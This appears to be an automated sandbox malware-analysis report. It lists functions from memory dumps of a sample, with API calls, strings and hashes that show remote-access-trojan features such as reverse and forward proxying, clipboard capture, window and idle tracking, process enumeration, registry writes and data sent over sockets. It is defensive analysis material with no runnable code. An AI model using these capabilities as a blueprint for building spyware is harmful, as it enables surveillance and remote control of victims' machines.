API String ID: 911427763-3954389425
Opcode ID: e35a68922c640fc2f8da35ce526cea5ab2090223535a03457a7cee667bb96fff
Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
Opcode Fuzzy Hash: e35a68922c640fc2f8da35ce526cea5ab2090223535a03457a7cee667bb96fff
Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F

Function 0216AAA1 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02131FBC,?,00000050,00465E00,00000000), ref: 0216AAF9
GetLastError.KERNEL32(?,?,02131FBC,?,00000050,00465E00,00000000), ref: 0216AB06
__dosmaperr.LIBCMT ref: 0216AB0D
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02131FBC,?,00000050,00465E00,00000000), ref: 0216AB39
GetLastError.KERNEL32(?,?,?,02131FBC,?,00000050,00465E00,00000000), ref: 0216AB43
__dosmaperr.LIBCMT ref: 0216AB4A
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,00465E00,00000000,00000000,?,?,?,?,?,?,02131FBC,?), ref: 0216AB8D
GetLastError.KERNEL32(?,?,?,?,?,?,02131FBC,?,00000050,00465E00,00000000), ref: 0216AB97
__dosmaperr.LIBCMT ref: 0216AB9E
_free.LIBCMT ref: 0216ABAA
_free.LIBCMT ref: 0216ABB1

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction ID: d73ed0ae4ed1a9fef7689f17964f3a53d25fee099f144fd0a303fbb603d5be6f
Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction Fuzzy Hash: DE318D7284420ABFDF25AFA4DC48DBE7B7AEF45325B104269F910661A0DB31C960DBA0

Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
__dosmaperr.LIBCMT ref: 0043A8A6
MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
__dosmaperr.LIBCMT ref: 0043A8E3
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
__dosmaperr.LIBCMT ref: 0043A937
_free.LIBCMT ref: 0043A943
_free.LIBCMT ref: 0043A94A

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
String ID:
API String ID: 2441525078-0
Opcode ID: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
Opcode Fuzzy Hash: 333218d4c374834d2f5605b8d1434d3a456e4a6d1d3d381f1630f1823c8abcb3
Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A

Function 0214A21B Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 176timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0214A220
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0214A2DE
GetLocalTime.KERNEL32(?), ref: 0214A36C

Strings

S~E, xrefs: 0214A21B
PG, xrefs: 0214A330
PG, xrefs: 0214A27D
time_%04i%02i%02i_%02i%02i%02i, xrefs: 0214A306
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0214A301, 0214A322, 0214A390
PG, xrefs: 0214A414

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CreateDirectoryH_prologLocalTime
String ID: S~E$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
API String ID: 2709065311-4224798360
Opcode ID: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
Instruction ID: a146314a6cfe5b4800e3322eba46b886c4dc7a89207b6a4f16ce351765101700
Opcode Fuzzy Hash: 794bb2b208bad590467bd00f6a6004f6f957c756b4e279e9b706f936551238fb
Instruction Fuzzy Hash: 3751A171AC02589ECF15FBB4CC60AFE776BAF55300F40442AE909AB190EF749E45CBA4

Function 02135707 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 02135726
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 021357D6
TranslateMessage.USER32(?), ref: 021357E5
DispatchMessageA.USER32(?), ref: 021357F0
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 021358A8
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 021358E0

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

Strings

CloseChat, xrefs: 02135870
DisplayMessage, xrefs: 02135853
GetMessage, xrefs: 0213585F

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
Instruction ID: cc9852b5f8c8af8162a1f7bb8d663e4fd29deb5a0461bc3c77b768f8280f779a
Opcode Fuzzy Hash: 0cfa6036874a5bca0beebe56fa67ee0d4ba4c2ce27f22afbcff1deb0655a3de4
Instruction Fuzzy Hash: 9B418D32684301AFCA16FB74DC4496E77ABAB85B00B40492DF91A93194EF34DD09CB96

Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 004054BF
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
TranslateMessage.USER32(?), ref: 0040557E
DispatchMessageA.USER32(?), ref: 00405589
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

DisplayMessage, xrefs: 004055EC
GetMessage, xrefs: 004055F8
CloseChat, xrefs: 00405609

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: b5f7345ad3af50d46b0e596d9cce40b6030f7c245edf2fe82206e3ec3cd81a29
Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
Opcode Fuzzy Hash: b5f7345ad3af50d46b0e596d9cce40b6030f7c245edf2fe82206e3ec3cd81a29
Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A

Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
CloseHandle.KERNEL32(00000000), ref: 00417DE5
DeleteFileA.KERNEL32(00000000), ref: 00417DF4
ShellExecuteEx.SHELL32(0000003C), ref: 00417DA8

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

Temp, xrefs: 00417D00
<, xrefs: 00417D83
@, xrefs: 00417D8A
0VG, xrefs: 00417E21
0VG, xrefs: 00417DB5

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
String ID: 0VG$0VG$<$@$Temp
API String ID: 1704390241-2575729100
Opcode ID: fae93c5914ee133f6863b656bd13bcfd6cf6cae480fdf3b22fa904760918bb6e
Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
Opcode Fuzzy Hash: fae93c5914ee133f6863b656bd13bcfd6cf6cae480fdf3b22fa904760918bb6e
Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99

Function 021410C8 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 021410D5
int.LIBCPMT ref: 021410E8

Part of subcall function 0213E328: std::_Lockit::_Lockit.LIBCPMT ref: 0213E339
Part of subcall function 0213E328: std::_Lockit::~_Lockit.LIBCPMT ref: 0213E353

std::_Facet_Register.LIBCPMT ref: 02141128
std::_Lockit::~_Lockit.LIBCPMT ref: 02141131
__CxxThrowException@8.LIBVCRUNTIME ref: 0214114F
__Init_thread_footer.LIBCMT ref: 02141190

Strings

0kG, xrefs: 02141198
,kG, xrefs: 0214116B
@!G, xrefs: 021410E0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
String ID: ,kG$0kG$@!G
API String ID: 3815856325-312998898
Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
Instruction ID: 8516ebb9d017750b043b9a1780c69077a3e4e3907426304d26a8f74e1d6f403a
Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
Instruction Fuzzy Hash: 15212336A80624AFCB14EB78D9489ED37ABDF05720B610166E41CE7290DF30A981CFD4

Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00416941
EmptyClipboard.USER32 ref: 0041694F
CloseClipboard.USER32 ref: 00416955
OpenClipboard.USER32 ref: 0041695C
GetClipboardData.USER32(0000000D), ref: 0041696C
GlobalFix.KERNEL32(00000000), ref: 00416975
GlobalUnWire.KERNEL32(00000000), ref: 0041697E
CloseClipboard.USER32 ref: 00416984

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

Strings

!D@, xrefs: 00417089

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseGlobalOpen$DataEmptyWiresend
String ID: !D@
API String ID: 653963949-604454484
Opcode ID: 76a9b012180f56ed20651fb419ef0c01d07dba464a9d74d76ee724e998f7da9b
Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
Opcode Fuzzy Hash: 76a9b012180f56ed20651fb419ef0c01d07dba464a9d74d76ee724e998f7da9b
Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69

Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
Opcode Fuzzy Hash: 06969d4054276dbf450069cd14adbb04630f9483e2dd0d38d9b092c5558579ee
Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA

Function 02178388 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0217839C

Part of subcall function 021769E9: HeapFree.KERNEL32(00000000,00000000,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?), ref: 021769FF
Part of subcall function 021769E9: GetLastError.KERNEL32(?,?,02180ED6,?,00000000,?,00000000,?,0218117A,?,00000007,?,?,021816C5,?,?), ref: 02176A11

_free.LIBCMT ref: 021783A8
_free.LIBCMT ref: 021783B3
_free.LIBCMT ref: 021783BE
_free.LIBCMT ref: 021783C9
_free.LIBCMT ref: 021783D4
_free.LIBCMT ref: 021783DF
_free.LIBCMT ref: 021783EA
_free.LIBCMT ref: 021783F5
_free.LIBCMT ref: 02178403

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: e13a089cedffdd17df1e69fddf4bd2ed83ee9d65296342a50744c1efb886346b
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction Fuzzy Hash: C9116076540548FFCB05EF95DC42CD93BBAEF88350B5180AABA488B221DB31EE50DF80

Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00448135

Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA

_free.LIBCMT ref: 00448141
_free.LIBCMT ref: 0044814C
_free.LIBCMT ref: 00448157
_free.LIBCMT ref: 00448162
_free.LIBCMT ref: 0044816D
_free.LIBCMT ref: 00448178
_free.LIBCMT ref: 00448183
_free.LIBCMT ref: 0044818E
_free.LIBCMT ref: 0044819C

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5

Function 02142D1B Relevance: 14.5, APIs: 4, Strings: 4, Instructions: 482fileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02142D34

Part of subcall function 0214BBDF: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,021342E3), ref: 0214BC06

Part of subcall function 021487CF: CloseHandle.KERNEL32(0213435C,?,?,0213435C,00465E74), ref: 021487E5
Part of subcall function 021487CF: CloseHandle.KERNEL32(t^F,?,?,0213435C,00465E74), ref: 021487EE

DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 0214302C
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 02143063
DeleteFileW.KERNEL32(00000000,00465E74,00465E74,00465E74), ref: 0214309F

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

Strings

NG, xrefs: 021431D3
0TG, xrefs: 0214328D
NG, xrefs: 02143328
0TG, xrefs: 021433B3

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: File$Delete$CloseHandle$CurrentModuleNameProcesssend
String ID: 0TG$0TG$NG$NG
API String ID: 1937857116-278358599
Opcode ID: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
Instruction ID: 2908a7f0a65a7d6612443ddac0aaeaaf2486a7a4dc6651db0bbc219b45bfced4
Opcode Fuzzy Hash: 32d90d55cb05bb5b069b036a4d337625a659ecb65ee468f1972c10dd974b4365
Instruction Fuzzy Hash: AC0231315883809FC32AFB24D990AEFB3E7AF94340F50492DE59A47194EF709E49CE56

Function 0214235E Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 238threadCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0214236D

Part of subcall function 02143ADE: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 02143AEC
Part of subcall function 02143ADE: RegSetValueExA.ADVAPI32(004660A4,000000AF,00000000,00000004,00000001,00000004,?,?,?,0213C3B9,00466C48,00000001,000000AF,004660A4), ref: 02143B07
Part of subcall function 02143ADE: RegCloseKey.ADVAPI32(004660A4,?,?,?,0213C3B9,00466C48,00000001,000000AF,004660A4), ref: 02143B12

OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 021423AD
CloseHandle.KERNEL32(00000000), ref: 021423BC
CreateThread.KERNEL32(00000000,00000000,004127EE,00000000,00000000,00000000), ref: 02142412
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02142681

Strings

WDH, xrefs: 0214241C, 02142422, 02142687

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: WDH
API String ID: 3018269243-2057347716
Opcode ID: 74403de45dc8594ac09b600501df28296d1fe5c2fc22971754c3b7eaf4df139d
Instruction ID: fabc27947f2ddb2291a3f4fb79d55bb88933fce92d5f69e1a52fd42517f1faf2
Opcode Fuzzy Hash: 74403de45dc8594ac09b600501df28296d1fe5c2fc22971754c3b7eaf4df139d
Instruction Fuzzy Hash: E771BF326843006FC219FB64DD95DAF73A7AF95710F50052EF88A53190EF749E48CAA6

Function 0213F6DB Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 210processCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0213F6F5
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0213F720
Process32FirstW.KERNEL32(00000000,0000022C), ref: 0213F73C
Process32NextW.KERNEL32(00000000,0000022C), ref: 0213F7BB
CloseHandle.KERNEL32(00000000,?,00000000), ref: 0213F7CA

Part of subcall function 0214C444: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0214C45C
Part of subcall function 0214C444: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0214C46F

CloseHandle.KERNEL32(00000000), ref: 0213F8D5

Strings

hdF, xrefs: 0213F842
hdF, xrefs: 0213F7D0

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
String ID: hdF$hdF
API String ID: 3756808967-2522469806
Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
Instruction ID: f9ee9ac28f8051b3f20de29dad7e990e3c83f175e76ce7c5cded0f19583e3450
Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
Instruction Fuzzy Hash: C0714F315983419FC726FB20D890AAFB7A7AF90340F50482DE986431A1EF34DA4ECF56

Function 0214175C Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 0214177B
inet_ntoa.WS2_32(?), ref: 02141816

Strings

StopReverse, xrefs: 02141908
GetDirectListeningPort, xrefs: 02141919
StartForward, xrefs: 021418DA
StopForward, xrefs: 021418F7
NG, xrefs: 021417A1
StartReverse, xrefs: 021418E6

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
Instruction ID: a8edc3b3d8fa664bfd052df25c8c5e3295211ecbb35691e5b4db1e00d5833c11
Opcode Fuzzy Hash: 4f065297b3db04d08fab799040971db11ee763eabe84935d17a6cb70e7b06ee3
Instruction Fuzzy Hash: 8951D871684311AFC619FB34DD18B6E3797AB40304F404529E90D9B6E4EF748D89CBD6

Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00411514
inet_ntoa.WS2_32(?), ref: 004115AF

Strings

StopReverse, xrefs: 004116A1
StartForward, xrefs: 00411673
GetDirectListeningPort, xrefs: 004116B2
StartReverse, xrefs: 0041167F
NG, xrefs: 0041153A
StopForward, xrefs: 00411690

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
API String ID: 3578746661-3604713145
Opcode ID: bb7ea6f09d35f39c7362e13aa035eb31be42a794653340168636899a0376fc5a
Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
Opcode Fuzzy Hash: bb7ea6f09d35f39c7362e13aa035eb31be42a794653340168636899a0376fc5a
Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE

Function 0213AF3D Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 156sleepCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0213AF9F
Sleep.KERNEL32(000001F4), ref: 0213AFAA
GetForegroundWindow.USER32 ref: 0213AFB0
GetWindowTextLengthW.USER32(00000000), ref: 0213AFB9
GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0213AFED
Sleep.KERNEL32(000003E8), ref: 0213B0BB

Part of subcall function 0213A89D: SetEvent.KERNEL32(00000000,?,00000000,0213B471,00000000), ref: 0213A8C9

Strings

[, xrefs: 0213B055
{ User has been idle for , xrefs: 0213B0ED

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Window$SleepText$EventForegroundInit_thread_footerLength
String ID: [${ User has been idle for
API String ID: 911427763-3934435721
Opcode ID: c10d38f269757a906d0ca9fba1566ff1fbaabb7f14d30099c27d05f9eae8babe
Instruction ID: 077aba471c1c4b5c8cd044bafd2b9f529b3d34ecec4cce39efd3f9bcb73b5bb9
Opcode Fuzzy Hash: c10d38f269757a906d0ca9fba1566ff1fbaabb7f14d30099c27d05f9eae8babe
Instruction Fuzzy Hash: 8D51C4726883409FD716FB20D854BAE77A7BF84708F40052DF88A961A0EF749F45CE96

Function 0217B623 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0217BD98,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0217B665
__fassign.LIBCMT ref: 0217B6E0
__fassign.LIBCMT ref: 0217B6FB
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0217B721
WriteFile.KERNEL32(?,FF8BC35D,00000000,0217BD98,00000000,?,?,?,?,?,?,?,?,PkGNG,0217BD98,?), ref: 0217B740
WriteFile.KERNEL32(?,?,00000001,0217BD98,00000000,?,?,?,?,?,?,?,?,PkGNG,0217BD98,?), ref: 0217B779

Strings

PkGNG, xrefs: 0217B625

Memory Dump Source

